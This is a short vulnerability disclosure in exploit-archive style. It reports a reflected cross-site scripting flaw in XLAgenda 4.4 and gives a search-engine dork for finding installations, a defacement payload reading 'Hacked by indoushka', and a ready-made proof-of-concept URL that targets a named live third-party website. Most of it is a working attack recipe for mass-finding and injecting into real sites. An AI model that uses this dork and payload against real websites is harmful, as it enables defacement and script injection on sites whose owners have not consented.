========================================================================
| # Title : XLAgenda 4.4 Xss vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Tested on : windows 8.1 Français V.(Pro)
| # Version : 4.4
| # Vendor : http://www.xlagenda.fr/
| # Dork : Powered by XLAgenda 4.4
========================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine
[+] use payload : <marquee><font color=lime size=32>Hacked by indoushka</font></marquee>
https://www.astromaine.fr/site2/xlagenda42/rechercher.php?Submit2=Rechercher&mois=1&recherche=1'"()%26%25<acx><marquee><font color=lime size=32>poc by indoushka</font></marquee>
Greetz : ===============================================================
|
jericho * Larry W. Cashdollar * moncet-1 * Gjoko Krstic |
|
========================================================================